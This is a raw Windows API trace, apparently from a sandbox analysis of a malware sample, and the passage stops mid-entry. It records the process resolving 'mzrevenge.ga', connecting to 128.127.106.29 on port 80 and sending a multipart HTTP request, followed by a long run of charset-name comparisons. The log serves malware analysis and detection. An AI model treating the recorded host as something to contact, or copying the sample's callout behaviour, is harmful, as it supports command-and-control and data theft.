SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fb10*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19fb10*=0) returned 0x12b5 [0105.136] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fb10*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19fb10*=0) returned 0x0 [0105.136] socket (af=2, type=1, protocol=0) returned 0x3f0 [0105.136] getsockopt (in: s=0x3f0, level=65535, optname=4104, optval=0x19fb10, optlen=0x19fb0c | out: optval="\x01", optlen=0x19fb0c) returned 0 [0105.136] getsockopt (in: s=0x3f0, level=6, optname=1, optval=0x19fb10, optlen=0x19fb0c | out: optval="", optlen=0x19fb0c) returned 0 [0105.136] setsockopt (s=0x3f0, level=65535, optname=4, optval="", optlen=4) returned 0 [0105.136] htons (hostshort=0x0) returned 0x0 [0105.136] bind (s=0x3f0, addr=0x19fa68*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0105.136] getsockname (in: s=0x3f0, name=0x19fa5c, namelen=0x19fadc | out: name=0x19fa5c*(sa_family=2, sin_port=0xc222, sin_addr="0.0.0.0"), namelen=0x19fadc) returned 0 [0105.137] htons (hostshort=0x22c2) returned 0xc222 [0105.137] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mzrevenge.ga", cchCount1=12, lpString2="LOCALHOST", cchCount2=9) returned 3 [0105.137] GetAddrInfoW (in: pNodeName="mzrevenge.ga", pServiceName=0x0, pHints=0x19fb10*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fb30 | out: ppResult=0x19fb30*=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="128.127.106.29"), ai_next=0x0)) returned 0 [0105.138] FreeAddrInfoW (pAddrInfo=0xa1e348*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xa4c1d8*(sa_family=2, sin_port=0x0, sin_addr="128.127.106.29"), ai_next=0x0)) [0105.138] htons (hostshort=0x50) returned 0x5000 [0105.138] connect (s=0x3f0, name=0x19fac0*(sa_family=2, sin_port=0x50, sin_addr="128.127.106.29"), namelen=16) returned 0 [0105.162] getsockname (in: s=0x3f0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0xc222, sin_addr="192.168.0.147"), namelen=0x19fb28) returned 0 [0105.162] htons (hostshort=0x22c2) returned 0xc222 [0105.162] getpeername (in: s=0x3f0, name=0x19faa8, namelen=0x19fb28 | out: name=0x19faa8*(sa_family=2, sin_port=0x50, sin_addr="128.127.106.29"), namelen=0x19fb28) returned 0 [0105.162] htons (hostshort=0x5000) returned 0x50 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Type", cchCount2=12) returned 1 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Type", cchCount2=12) returned 1 [0105.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0105.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="--------031620094059674", cchCount1=1, lpString2="\"", cchCount2=1) returned 1 [0105.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="boundary=--------031620094059674", cchCount1=7, lpString2="charset", cchCount2=7) returned 1 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] GetCurrentThreadId () returned 0x1358 [0105.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Type", cchCount2=12) returned 1 [0105.162] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Type", cchCount2=12) returned 2 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0105.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Host", cchCount2=4) returned 1 [0105.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Host", cchCount2=4) returned 1 [0105.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Host", cchCount2=4) returned 1 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] GetCurrentThreadId () returned 0x1358 [0105.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Accept", cchCount2=6) returned 3 [0105.163] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Accept", cchCount2=6) returned 3 [0105.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Accept", cchCount2=6) returned 3 [0105.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="Accept", cchCount2=6) returned 3 [0105.164] GetCurrentThreadId () returned 0x1358 [0105.164] GetCurrentThreadId () returned 0x1358 [0105.164] GetCurrentThreadId () returned 0x1358 [0105.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="User-Agent", cchCount2=10) returned 1 [0105.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="User-Agent", cchCount2=10) returned 1 [0105.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="User-Agent", cchCount2=10) returned 1 [0105.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Host", cchCount1=4, lpString2="User-Agent", cchCount2=10) returned 1 [0105.164] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Accept", cchCount1=6, lpString2="User-Agent", cchCount2=10) returned 1 [0105.164] GetCurrentThreadId () returned 0x1358 [0105.164] GetCurrentThreadId () returned 0x1358 [0105.164] GetCurrentThreadId () returned 0x1358 [0105.164] send (s=0x3f0, buf=0x240fe08*, len=384, flags=0) returned 384 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="US-ASCII", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.4-1968", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-6", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.4-1986", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.irv:1991", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASCII", cchCount1=5, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-US", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="us", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM367", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cp367", cchCount1=5, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csASCII", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-10646-UTF-1", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO10646UTF1", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.basic:1983", cchCount1=18, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ref", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO646basic1983", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.165] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INVARIANT", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csINVARIANT", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_646.irv:1983", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-2", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="irv", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2IntlRefVersion", cchCount1=20, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BS_4730", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-4", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-GB", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gb", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uk", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO4UnitedKingdom", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-SEFI", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-8-1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSSEFI", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-SEFI-ADD", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-8-2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSSEFIADD", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-DANO", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-9-1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSDANO", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NATS-DANO-ADD", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-9-2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csNATSDANOADD", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEN_850200_B", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-10", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FI", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FI", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-SE", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.166] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO10Swedish", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEN_850200_C", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-11", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-SE2", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="se2", cchCount1=3, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO11SwedishForNames", cchCount1=22, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS_C_5601-1987", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-149", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KS_C_5601-1989", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KSC_5601", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="korean", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csKSC56011987", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-KR", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022KR", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EUC-KR", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csEUCKR", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-JP", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022JP", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-JP-2", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2022JP2", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-CN", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-2022-CN-EXT", cchCount1=15, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969-jp", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-13", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="katakana", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x0201-7", cchCount1=7, lpString2="UTF-8", cchCount2=5) returned 3 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO13JISC6220jp", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6220-1969-ro", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.167] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-14", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-JP", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO14JISC6220ro", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IT", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-15", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-IT", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO15Italian", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PT", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-16", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-PT", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO16Portuguese", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ES", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-17", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-ES", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO17Spanish", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek7-old", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-18", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO18Greek7Old", cchCount1=16, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin-greek", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-19", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO19LatinGreek", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DIN_66003", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-21", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="de", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-DE", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO21German", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NF_Z_62-010_(1973)", cchCount1=18, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-25", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-FR1", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO25French", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Latin-greek-1", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.168] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-27", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO27LatinGreek1", cchCount1=18, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5427", cchCount1=8, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-37", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO5427Cyrillic", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6226-1978", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-42", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO42JISC62261978", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BS_viewdata", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-47", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO47BSViewdata", cchCount1=17, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS", cchCount1=4, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-49", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO49INIS", cchCount1=11, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS-8", cchCount1=6, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-50", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO50INIS8", cchCount1=12, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INIS-cyrillic", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-51", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO51INISCyrillic", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5427:1981", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-54", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO5427Cyrillic1981", cchCount1=19, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_5428:1980", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-55", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO5428Greek", cchCount1=14, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GB_1988-80", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.169] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-57", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cn", cchCount1=2, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-CN", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO57GB1988", cchCount1=13, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GB_2312-80", cchCount1=10, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-58", cchCount1=9, lpString2="UTF-8", cchCount2=5) returned 1 [0105.170] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="chinese", cchCount1=7, 